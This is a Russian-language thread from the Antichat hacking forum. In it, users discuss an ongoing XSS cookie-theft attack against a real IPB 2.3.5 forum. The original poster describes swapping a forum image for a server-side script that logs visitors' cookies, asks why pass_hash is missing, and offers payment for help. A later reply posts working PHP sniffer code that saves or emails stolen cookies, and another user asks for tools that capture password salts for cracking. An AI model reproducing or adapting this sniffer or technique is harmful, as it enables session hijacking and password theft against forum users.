Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Отсутствует pass_hash в cookie IPB 2.3.5. |
14.06.2009, 13:01
|
|
Новичок
Регистрация: 12.06.2009
Сообщений: 4
Провел на форуме:
5485
Репутация:
2
|
|
Отсутствует pass_hash в cookie IPB 2.3.5.
Друзья! У меня возникла проблема с кражей cookie.
Воруются они с форума на IPB 2.3.5 через XSS.
Удаётся при наведении юзером мышкой на картинку заменять одно из изображений форума на такое же точно, только на моём сервере . Вы наверное уже понимаете, что на моём сервере не совсем изображение, а скрипт, который сначала записывает cookie, а потом уже выдаёт картинку. Т.е. выглядит это так: site/images/123.jpg? cookie.
Так вот, ситуация такова - куки в браузере есть полностью, а в логах - не достаёт важных параметров member_id (иногда) и pass_hash (почти всегда).
Исключение составляют юзеры с Opera 9.23 и 9.27 - у них куки воруются отлично - pass_hash присутствует.
Подскажите, пожалуйста, как быть! Возможности JS очень ограничены, форум часто режет или портит скрипт.
Спасибо  |
|
|
14.06.2009, 19:23
|
|
Новичок
Регистрация: 12.06.2009
Сообщений: 4
Провел на форуме:
5485
Репутация:
2
|
|
Товарищи! Могу заплатить за решение проблемы. Тянуть для меня опасно.
|
|
|
|
14.06.2009, 19:27
|
|
Постоянный
Регистрация: 12.02.2009
Сообщений: 527
Провел на форуме:
4566140
Репутация:
0
|
|
может чел не авторизовался
|
|
|
|
14.06.2009, 19:43
|
|
Новичок
Регистрация: 12.06.2009
Сообщений: 4
Провел на форуме:
5485
Репутация:
2
|
|
Нет, member_id иногда присутствует, а вот pass_hash нет никогда.
Да и вообще анонимов сниффер из лога сразу отсеивает, дело точно не в этом.
Ну так что, даже за деньги никто не поможет?
|
|
|
|
15.06.2009, 12:50
|
|
Новичок
Регистрация: 12.06.2009
Сообщений: 4
Провел на форуме:
5485
Репутация:
2
|
|
Сегодня поймал юзера с Firefox 3.0.5. Непонятно.
|
|
|
|
13.07.2009, 07:56
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
48878
Репутация:
0
|
|
Такая-же проблема...
крадёт только сессию... пробывал на разных браузерах...результат почти один и тотже (иногда и куки сесии нет) .
P.S Человек с пятью не, можешь свой снифер скинуть?
|
|
|
|
15.07.2009, 10:34
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Вроде баг с кражей кукисов доступен только до 2.1.7 IPB, в позжих версиях он не пашет
|
|
|
|
17.07.2009, 10:31
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
48878
Репутация:
0
|
|
shOotzy
Сообщение от G4bR1eL
Вроде баг с кражей кукисов доступен только до 2.1.7 IPB, в позжих версиях он не пашет
Сообщение от Человек с пятью не
Друзья! У меня возникла проблема с кражей cookie.
Воруются они с форума на IPB 2.3.5 через XSS.
Удаётся при наведении юзером мышкой на картинку заменять одно из изображений форума на такое же точно, только на моём сервере . Вы наверное уже понимаете, что на моём сервере не совсем изображение, а скрипт, который сначала записывает cookie, а потом уже выдаёт картинку. Т.е. выглядит это так: site/images/123.jpg? cookie.
Так вот, ситуация такова - куки в браузере есть полностью, а в логах - не достаёт важных параметров member_id (иногда) и pass_hash (почти всегда).
Исключение составляют юзеры с Opera 9.23 и 9.27 - у них куки воруются отлично - pass_hash присутствует.
Подскажите, пожалуйста, как быть! Возможности JS очень ограничены, форум часто режет или портит скрипт.
Спасибо
P.S есть у кого-нибудь Нормальный сниффер?
|
|
|
|
17.07.2009, 17:54
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Код:
<?php
$file = true; //сохранять в файл
$filename = "cookies.txt"; //имя файла
$mail = false; //отправлять на мыло
$mailaddr = "xxx@mail.ru"; //адрес мыла
if ($file)
{ $f = fopen($filename, 'a');
flock($f,2);
fputs($f, $QUERY_STRING."\r\n\r\n\r\n");
fflush ($f);
flock($f,3);
fclose($f); }
if ($mail)
{ mail ($mailaddr, "Uzer waz XSSed! Eat his cookies! :)", "$QUERY_STRING"); }
?>
Должен пахать, пробуй. Хеши точно тырит.
Кстати не по теме , но все равно - есть ли такие сниферы которые тянут с хешем salt (соль). Если у кого есть киньте, ибо надо для расшифровки некоторых пассов на 2.1.7.
Последний раз редактировалось G4bR1eL; 17.07.2009 в 18:12..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
